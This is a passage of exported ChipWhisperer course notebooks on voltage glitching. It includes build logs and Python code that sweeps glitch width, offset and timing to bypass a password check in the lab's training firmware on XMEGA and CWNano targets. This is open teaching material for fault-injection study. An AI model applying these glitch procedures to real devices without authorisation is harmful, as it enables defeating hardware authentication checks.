2498 717 | 2498 718 | successes = 3, resets = 2, repeat = 5, ext\_offset = 169 719 | Done glitching 720 | 721 | 722 | 723 | 724 | .. image:: img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_14_1.png 725 | 726 | 727 | 728 | **In [11]:** 729 | 730 | .. code:: ipython3 731 | 732 | %matplotlib inline 733 | gc.results.plot_2d(plotdots={"success":"+g", "reset":"xr", "normal":None}) 734 | 735 | 736 | **Out [11]:** 737 | 738 | 739 | .. image:: img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_15_0.png 740 | 741 | 742 | 743 | **In [12]:** 744 | 745 | .. code:: ipython3 746 | 747 | scope.dis() 748 | target.dis() 749 | 750 | Unlike the other ChipWhisperers, the Nano doesn’t have sychronous 751 | glitching. This means that ``ext_offset`` is a mixture of both the 752 | offset within the clock cycle, which affects glitch success, and 753 | ext_offset, which affects which instruction is being glitched. As such, 754 | ext_offset settings you find in this lab won’t be directly applicable to 755 | other labs. That being said, good ranges for repeat and the success rate 756 | of glitches still gives valuable information that you can apply to other 757 | labs. 758 | 759 | 760 | **In [ ]:** 761 | 762 | -------------------------------------------------------------------------------- /courses_fault101_SOLN_Fault 2_2 - Voltage Glitching to Bypass Password-OPENADC-CWLITEXMEGA.rst: -------------------------------------------------------------------------------- 1 | Part 2, Topic 2: Voltage Glitching to Bypass Password 2 | ===================================================== 3 | 4 | 5 | 6 | **SUMMARY:** *We’ve seen how voltage glitching can be used to corrupt 7 | calculations, just like clock glitching. Let’s continue on and see if it 8 | can also be used to break past a password check.* 9 | 10 | **LEARNING OUTCOMES:** 11 | 12 | - Applying previous glitch settings to new firmware 13 | - Checking for success and failure when glitching 14 | 15 | Firmware 16 | -------- 17 | 18 | Again, we’ve already covered this lab, so it’ll be mostly up to you! 19 | 20 | 21 | **In [1]:** 22 | 23 | .. code:: ipython3 24 | 25 | SCOPETYPE = 'OPENADC' 26 | PLATFORM = 'CWLITEXMEGA' 27 | 28 | 29 | **In [2]:** 30 | 31 | .. code:: bash 32 | 33 | %%bash -s "$PLATFORM" 34 | cd ../../../hardware/victims/firmware/simpleserial-glitch 35 | make PLATFORM=$1 CRYPTO_TARGET=NONE 36 | 37 | 38 | **Out [2]:** 39 | 40 | 41 | 42 | .. parsed-literal:: 43 | 44 | SS\_VER set to SS\_VER\_1\_1 45 | rm -f -- simpleserial-glitch-CWLITEXMEGA.hex 46 | rm -f -- simpleserial-glitch-CWLITEXMEGA.eep 47 | rm -f -- simpleserial-glitch-CWLITEXMEGA.cof 48 | rm -f -- simpleserial-glitch-CWLITEXMEGA.elf 49 | rm -f -- simpleserial-glitch-CWLITEXMEGA.map 50 | rm -f -- simpleserial-glitch-CWLITEXMEGA.sym 51 | rm -f -- simpleserial-glitch-CWLITEXMEGA.lss 52 | rm -f -- objdir/\*.o 53 | rm -f -- objdir/\*.lst 54 | rm -f -- simpleserial-glitch.s simpleserial.s XMEGA\_AES\_driver.s uart.s usart\_driver.s xmega\_hal.s 55 | rm -f -- simpleserial-glitch.d simpleserial.d XMEGA\_AES\_driver.d uart.d usart\_driver.d xmega\_hal.d 56 | rm -f -- simpleserial-glitch.i simpleserial.i XMEGA\_AES\_driver.i uart.i usart\_driver.i xmega\_hal.i 57 | . 58 | Welcome to another exciting ChipWhisperer target build!! 59 | avr-gcc.exe (WinAVR 20100110) 4.3.3 60 | Copyright (C) 2008 Free Software Foundation, Inc. 61 | This is free software; see the source for copying conditions. There is NO 62 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 63 | 64 | . 65 | Compiling C: simpleserial-glitch.c 66 | avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-glitch.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial-glitch.o.d simpleserial-glitch.c -o objdir/simpleserial-glitch.o 67 | . 68 | Compiling C: .././simpleserial/simpleserial.c 69 | avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial.o.d .././simpleserial/simpleserial.c -o objdir/simpleserial.o 70 | . 71 | Compiling C: .././hal/xmega/XMEGA\_AES\_driver.c 72 | avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/XMEGA\_AES\_driver.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/XMEGA\_AES\_driver.o.d .././hal/xmega/XMEGA\_AES\_driver.c -o objdir/XMEGA\_AES\_driver.o 73 | . 74 | Compiling C: .././hal/xmega/uart.c 75 | avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/uart.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/uart.o.d .././hal/xmega/uart.c -o objdir/uart.o 76 | . 77 | Compiling C: .././hal/xmega/usart\_driver.c 78 | avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/usart\_driver.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/usart\_driver.o.d .././hal/xmega/usart\_driver.c -o objdir/usart\_driver.o 79 | . 80 | Compiling C: .././hal/xmega/xmega\_hal.c 81 | avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/xmega\_hal.lst -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/xmega\_hal.o.d .././hal/xmega/xmega\_hal.c -o objdir/xmega\_hal.o 82 | . 83 | Linking: simpleserial-glitch-CWLITEXMEGA.elf 84 | avr-gcc -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DHAL\_TYPE=HAL\_xmega -DPLATFORM=CWLITEXMEGA -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-glitch.o -I.././simpleserial/ -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial-glitch-CWLITEXMEGA.elf.d objdir/simpleserial-glitch.o objdir/simpleserial.o objdir/XMEGA\_AES\_driver.o objdir/uart.o objdir/usart\_driver.o objdir/xmega\_hal.o --output simpleserial-glitch-CWLITEXMEGA.elf -Wl,-Map=simpleserial-glitch-CWLITEXMEGA.map,--cref -lm 85 | . 86 | Creating load file for Flash: simpleserial-glitch-CWLITEXMEGA.hex 87 | avr-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-glitch-CWLITEXMEGA.elf simpleserial-glitch-CWLITEXMEGA.hex 88 | . 89 | Creating load file for EEPROM: simpleserial-glitch-CWLITEXMEGA.eep 90 | avr-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \ 91 | --change-section-lma .eeprom=0 --no-change-warnings -O ihex simpleserial-glitch-CWLITEXMEGA.elf simpleserial-glitch-CWLITEXMEGA.eep \|\| exit 0 92 | . 93 | Creating Extended Listing: simpleserial-glitch-CWLITEXMEGA.lss 94 | avr-objdump -h -S -z simpleserial-glitch-CWLITEXMEGA.elf > simpleserial-glitch-CWLITEXMEGA.lss 95 | . 96 | Creating Symbol Table: simpleserial-glitch-CWLITEXMEGA.sym 97 | avr-nm -n simpleserial-glitch-CWLITEXMEGA.elf > simpleserial-glitch-CWLITEXMEGA.sym 98 | Size after: 99 | text data bss dec hex filename 100 | 2288 22 52 2362 93a simpleserial-glitch-CWLITEXMEGA.elf 101 | +-------------------------------------------------------- 102 | + Default target does full rebuild each time. 103 | + Specify buildtarget == allquick == to avoid full rebuild 104 | +-------------------------------------------------------- 105 | +-------------------------------------------------------- 106 | + Built for platform CW-Lite XMEGA with: 107 | + CRYPTO\_TARGET = NONE 108 | + CRYPTO\_OPTIONS = 109 | +-------------------------------------------------------- 110 | 111 | 112 | 113 | 114 | **In [3]:** 115 | 116 | .. code:: ipython3 117 | 118 | %run "../../Setup_Scripts/Setup_Generic.ipynb" 119 | 120 | 121 | **Out [3]:** 122 | 123 | 124 | 125 | .. parsed-literal:: 126 | 127 | Serial baud rate = 38400 128 | INFO: Found ChipWhisperer😍 129 | 130 | 131 | 132 | 133 | **In [4]:** 134 | 135 | .. code:: ipython3 136 | 137 | fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM) 138 | cw.program_target(scope, prog, fw_path) 139 | 140 | 141 | **Out [4]:** 142 | 143 | 144 | 145 | .. parsed-literal:: 146 | 147 | XMEGA Programming flash... 148 | XMEGA Reading flash... 149 | Verified flash OK, 2309 bytes 150 | 151 | 152 | 153 | 154 | **In [5]:** 155 | 156 | .. code:: ipython3 157 | 158 | if PLATFORM == "CWLITEXMEGA": 159 | scope.clock.clkgen_freq = 32E6 160 | target.baud = 38400*32/7.37 161 | def reboot_flush(): 162 | scope.io.pdic = False 163 | time.sleep(0.1) 164 | scope.io.pdic = "high_z" 165 | time.sleep(0.1) 166 | #Flush garbage too 167 | target.flush() 168 | else: 169 | scope.clock.clkgen_freq = 24E6 170 | target.baud = 38400*24/7.37 171 | def reboot_flush(): 172 | scope.io.nrst = False 173 | time.sleep(0.05) 174 | scope.io.nrst = "high_z" 175 | time.sleep(0.05) 176 | #Flush garbage too 177 | target.flush() 178 | 179 | 180 | **Out [5]:** 181 | 182 | 183 | 184 | .. parsed-literal:: 185 | 186 | Serial baud rate = 166729.98643147896 187 | 188 | 189 | 190 | 191 | **In [6]:** 192 | 193 | .. code:: ipython3 194 | 195 | #Do glitch loop 196 | reboot_flush() 197 | pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68]) 198 | target.simpleserial_write('p', pw) 199 | 200 | val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check 201 | valid = val['valid'] 202 | if valid: 203 | response = val['payload'] 204 | raw_serial = val['full_response'] 205 | error_code = val['rv'] 206 | 207 | print(val) 208 | 209 | 210 | **Out [6]:** 211 | 212 | 213 | 214 | .. parsed-literal:: 215 | 216 | {'valid': True, 'payload': CWbytearray(b'01'), 'full\_response': 'r01\n', 'rv': 1} 217 | 218 | 219 | 220 | 221 | **In [7]:** 222 | 223 | .. code:: ipython3 224 | 225 | scope.glitch.clk_src = "clkgen" # set glitch input clock 226 | scope.glitch.output = "glitch_only" # glitch_out = clk ^ glitch 227 | scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called 228 | if PLATFORM == "CWLITEXMEGA": 229 | scope.io.glitch_lp = True 230 | scope.io.glitch_hp = True 231 | elif PLATFORM == "CWLITEARM": 232 | scope.io.glitch_lp = True 233 | scope.io.glitch_hp = True 234 | elif PLATFORM == "CW308_STM32F3": 235 | scope.io.glitch_hp = True 236 | scope.io.glitch_lp = True 237 | 238 | 239 | **In [8]:** 240 | 241 | .. code:: ipython3 242 | 243 | import matplotlib.pylab as plt 244 | import chipwhisperer.common.results.glitch as glitch 245 | gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"]) 246 | gc.display_stats() 247 | 248 | 249 | **Out [8]:** 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | **In [9]:** 265 | 266 | .. code:: ipython3 267 | 268 | from importlib import reload 269 | import chipwhisperer.common.results.glitch as glitch 270 | from tqdm.notebook import tqdm 271 | import re 272 | import struct 273 | gc.set_range("ext_offset", 11, 31) 274 | g_step = 0.2 275 | if PLATFORM=="CWLITEXMEGA": 276 | gc.set_range("width", 45.7, 47.8) 277 | gc.set_range("offset", 2.8, 10) 278 | scope.glitch.repeat = 10 279 | gc.set_range("ext_offset", 0, 15) 280 | elif PLATFORM == "CWLITEARM": 281 | #should also work for the bootloader memory dump 282 | gc.set_range("width", 34.7, 36) 283 | gc.set_range("offset", -41, -30) 284 | scope.glitch.repeat = 7 285 | elif PLATFORM == "CW308_STM32F3": 286 | #these specific settings seem to work well for some reason 287 | #also works for the bootloader memory dump 288 | gc.set_range("ext_offset", 11, 31) 289 | gc.set_range("width", 47.6, 49.6) 290 | gc.set_range("offset", -19, -21.5) 291 | scope.glitch.repeat = 5 292 | 293 | 294 | 295 | 296 | gc.set_global_step(g_step) 297 | scope.adc.timeout = 0.1 298 | 299 | reboot_flush() 300 | sample_size = 1 301 | successes = 0 302 | 303 | for glitch_settings in gc.glitch_values(): 304 | scope.glitch.offset = glitch_settings[1] 305 | scope.glitch.width = glitch_settings[0] 306 | scope.glitch.ext_offset = glitch_settings[2] 307 | if scope.adc.state: 308 | # can detect crash here (fast) before timing out (slow) 309 | print("Trigger still high!") 310 | gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)) 311 | reboot_flush() 312 | 313 | scope.arm() 314 | target.simpleserial_write('p', bytearray([0]*5)) 315 | scope.io.glitch_hp = False 316 | scope.io.glitch_hp = True 317 | scope.io.glitch_lp = False 318 | scope.io.glitch_lp = True 319 | ret = scope.capture() 320 | 321 | val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check 322 | if ret: 323 | print('Timeout - no trigger') 324 | gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)) 325 | 326 | #Device is slow to boot? 327 | reboot_flush() 328 | 329 | else: 330 | if val['valid'] is False: 331 | gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)) 332 | else: 333 | if val['rv'] == 1: #for loop check 334 | successes +=1 335 | gc.add("success", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)) 336 | print(val) 337 | print(val['payload']) 338 | print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset) 339 | print("🐙", end="") 340 | else: 341 | gc.add("normal", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)) 342 | 343 | 344 | **Out [9]:** 345 | 346 | 347 | 348 | .. parsed-literal:: 349 | 350 | ERROR:root:Ack error, couldn't decode return z˜0 351 | 352 | ERROR:root:Ack error: rRES 353 | 354 | 355 | 356 | 357 | 358 | .. parsed-literal:: 359 | 360 | Trigger still high! 361 | Trigger still high! 362 | Trigger still high! 363 | Trigger still high! 364 | 365 | 366 | 367 | 368 | 369 | .. parsed-literal:: 370 | 371 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 372 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 373 | 374 | 375 | 376 | 377 | 378 | .. parsed-literal:: 379 | 380 | Timeout - no trigger 381 | Trigger still high! 382 | 383 | 384 | 385 | 386 | 387 | .. parsed-literal:: 388 | 389 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 390 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 391 | 392 | 393 | 394 | 395 | 396 | .. parsed-literal:: 397 | 398 | Timeout - no trigger 399 | 400 | 401 | 402 | 403 | 404 | .. parsed-literal:: 405 | 406 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 407 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 408 | 409 | 410 | 411 | 412 | 413 | .. parsed-literal:: 414 | 415 | Timeout - no trigger 416 | Trigger still high! 417 | Trigger still high! 418 | 419 | 420 | 421 | 422 | 423 | .. parsed-literal:: 424 | 425 | ERROR:root:Ack error, couldn't decode return z˜0 426 | 427 | ERROR:root:Ack error, couldn't decode return z˜0 428 | 429 | 430 | 431 | 432 | 433 | 434 | .. parsed-literal:: 435 | 436 | Trigger still high! 437 | Trigger still high! 438 | Trigger still high! 439 | 440 | 441 | 442 | 443 | 444 | .. parsed-literal:: 445 | 446 | ERROR:root:Ack error, couldn't decode return z˜0 447 | 448 | ERROR:root:Ack error, couldn't decode return z˜0 449 | 450 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 451 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 452 | 453 | 454 | 455 | 456 | 457 | .. parsed-literal:: 458 | 459 | Timeout - no trigger 460 | 461 | 462 | 463 | 464 | 465 | .. parsed-literal:: 466 | 467 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 468 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 469 | 470 | 471 | 472 | 473 | 474 | .. parsed-literal:: 475 | 476 | Timeout - no trigger 477 | 478 | 479 | 480 | 481 | 482 | .. parsed-literal:: 483 | 484 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 485 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 486 | 487 | 488 | 489 | 490 | 491 | .. parsed-literal:: 492 | 493 | Timeout - no trigger 494 | Trigger still high! 495 | Trigger still high! 496 | 497 | 498 | 499 | 500 | 501 | .. parsed-literal:: 502 | 503 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 504 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 505 | 506 | 507 | 508 | 509 | 510 | .. parsed-literal:: 511 | 512 | Timeout - no trigger 513 | 514 | 515 | 516 | 517 | 518 | .. parsed-literal:: 519 | 520 | ERROR:root:Ack error, couldn't decode return z˜0 521 | 522 | 523 | 524 | 525 | 526 | 527 | .. parsed-literal:: 528 | 529 | Trigger still high! 530 | Trigger still high! 531 | Trigger still high! 532 | Trigger still high! 533 | 534 | 535 | 536 | 537 | 538 | .. parsed-literal:: 539 | 540 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 541 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 542 | 543 | 544 | 545 | 546 | 547 | .. parsed-literal:: 548 | 549 | Timeout - no trigger 550 | 551 | 552 | 553 | 554 | 555 | .. parsed-literal:: 556 | 557 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 558 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 559 | ERROR:root:Ack error, couldn't decode return z˜0 560 | 561 | 562 | 563 | 564 | 565 | 566 | .. parsed-literal:: 567 | 568 | Trigger still high! 569 | Trigger still high! 570 | Trigger still high! 571 | Trigger still high! 572 | Trigger still high! 573 | Trigger still high! 574 | Trigger still high! 575 | Trigger still high! 576 | 577 | 578 | 579 | 580 | 581 | .. parsed-literal:: 582 | 583 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 584 | WARNING:root:Timeout in OpenADC capture(), trigger FORCED 585 | 586 | 587 | 588 | 589 | 590 | .. parsed-literal:: 591 | 592 | Timeout - no trigger 593 | Trigger still high! 594 | 595 | 596 | 597 | 598 | **In [10]:** 599 | 600 | .. code:: ipython3 601 | 602 | scope.dis() 603 | target.dis() 604 | 605 | 606 | **In [11]:** 607 | 608 | .. code:: ipython3 609 | 610 | assert successes >= 1 611 | 612 | 613 | **In [ ]:** 614 | 615 | -------------------------------------------------------------------------------- /courses_fault101_SOLN_Fault 2_2B - Voltage Glitching with CWNano to Bypass Password-CWNANO-CWNANO.rst: -------------------------------------------------------------------------------- 1 | Part 2, Topic 2: Voltage Glitching to Bypass Password 2 | ===================================================== 3 | 4 | 5 | 6 | **SUMMARY:** *We’ve seen how voltage glitching can be used to corrupt 7 | calculations, just like clock glitching. Let’s continue on and see if it 8 | can also be used to break past a password check.* 9 | 10 | **LEARNING OUTCOMES:** 11 | 12 | - Applying previous glitch settings to new firmware 13 | - Checking for success and failure when glitching 14 | 15 | Firmware 16 | -------- 17 | 18 | Again, we’ve already covered this lab, so it’ll be mostly up to you! 19 | 20 | 21 | **In [1]:** 22 | 23 | .. code:: ipython3 24 | 25 | SCOPETYPE = 'CWNANO' 26 | PLATFORM = 'CWNANO' 27 | 28 | 29 | **In [2]:** 30 | 31 | .. code:: bash 32 | 33 | %%bash -s "$PLATFORM" 34 | cd ../../../hardware/victims/firmware/simpleserial-glitch 35 | make PLATFORM=$1 CRYPTO_TARGET=NONE 36 | 37 | 38 | **Out [2]:** 39 | 40 | 41 | 42 | .. parsed-literal:: 43 | 44 | SS\_VER set to SS\_VER\_1\_1 45 | rm -f -- simpleserial-glitch-CWNANO.hex 46 | rm -f -- simpleserial-glitch-CWNANO.eep 47 | rm -f -- simpleserial-glitch-CWNANO.cof 48 | rm -f -- simpleserial-glitch-CWNANO.elf 49 | rm -f -- simpleserial-glitch-CWNANO.map 50 | rm -f -- simpleserial-glitch-CWNANO.sym 51 | rm -f -- simpleserial-glitch-CWNANO.lss 52 | rm -f -- objdir/\*.o 53 | rm -f -- objdir/\*.lst 54 | rm -f -- simpleserial-glitch.s simpleserial.s stm32f0\_hal\_nano.s stm32f0\_hal\_lowlevel.s 55 | rm -f -- simpleserial-glitch.d simpleserial.d stm32f0\_hal\_nano.d stm32f0\_hal\_lowlevel.d 56 | rm -f -- simpleserial-glitch.i simpleserial.i stm32f0\_hal\_nano.i stm32f0\_hal\_lowlevel.i 57 | . 58 | Welcome to another exciting ChipWhisperer target build!! 59 | arm-none-eabi-gcc.exe (GNU Arm Embedded Toolchain 9-2020-q2-update) 9.3.1 20200408 (release) 60 | Copyright (C) 2019 Free Software Foundation, Inc. 61 | This is free software; see the source for copying conditions. There is NO 62 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 63 | 64 | . 65 | Compiling C: simpleserial-glitch.c 66 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-glitch.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial-glitch.o.d simpleserial-glitch.c -o objdir/simpleserial-glitch.o 67 | . 68 | Compiling C: .././simpleserial/simpleserial.c 69 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial.o.d .././simpleserial/simpleserial.c -o objdir/simpleserial.o 70 | . 71 | Compiling C: .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c 72 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_nano.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_nano.o.d .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c -o objdir/stm32f0\_hal\_nano.o 73 | . 74 | Compiling C: .././hal/stm32f0/stm32f0\_hal\_lowlevel.c 75 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_lowlevel.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_lowlevel.o.d .././hal/stm32f0/stm32f0\_hal\_lowlevel.c -o objdir/stm32f0\_hal\_lowlevel.o 76 | . 77 | Assembling: .././hal/stm32f0/stm32f0\_startup.S 78 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -ffunction-sections -DF\_CPU=7372800 -Wa,-gstabs,-adhlns=objdir/stm32f0\_startup.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ .././hal/stm32f0/stm32f0\_startup.S -o objdir/stm32f0\_startup.o 79 | . 80 | Linking: simpleserial-glitch-CWNANO.elf 81 | arm-none-eabi-gcc -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-glitch.o -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial-glitch-CWNANO.elf.d objdir/simpleserial-glitch.o objdir/simpleserial.o objdir/stm32f0\_hal\_nano.o objdir/stm32f0\_hal\_lowlevel.o objdir/stm32f0\_startup.o --output simpleserial-glitch-CWNANO.elf --specs=nano.specs --specs=nosys.specs -T .././hal/stm32f0\_nano/LinkerScript.ld -Wl,--gc-sections -lm -mthumb -mcpu=cortex-m0 -Wl,-Map=simpleserial-glitch-CWNANO.map,--cref -lm 82 | . 83 | Creating load file for Flash: simpleserial-glitch-CWNANO.hex 84 | arm-none-eabi-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-glitch-CWNANO.elf simpleserial-glitch-CWNANO.hex 85 | . 86 | Creating load file for EEPROM: simpleserial-glitch-CWNANO.eep 87 | arm-none-eabi-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \ 88 | --change-section-lma .eeprom=0 --no-change-warnings -O ihex simpleserial-glitch-CWNANO.elf simpleserial-glitch-CWNANO.eep \|\| exit 0 89 | . 90 | Creating Extended Listing: simpleserial-glitch-CWNANO.lss 91 | arm-none-eabi-objdump -h -S -z simpleserial-glitch-CWNANO.elf > simpleserial-glitch-CWNANO.lss 92 | . 93 | Creating Symbol Table: simpleserial-glitch-CWNANO.sym 94 | arm-none-eabi-nm -n simpleserial-glitch-CWNANO.elf > simpleserial-glitch-CWNANO.sym 95 | Size after: 96 | text data bss dec hex filename 97 | 4740 12 1292 6044 179c simpleserial-glitch-CWNANO.elf 98 | +-------------------------------------------------------- 99 | + Default target does full rebuild each time. 100 | + Specify 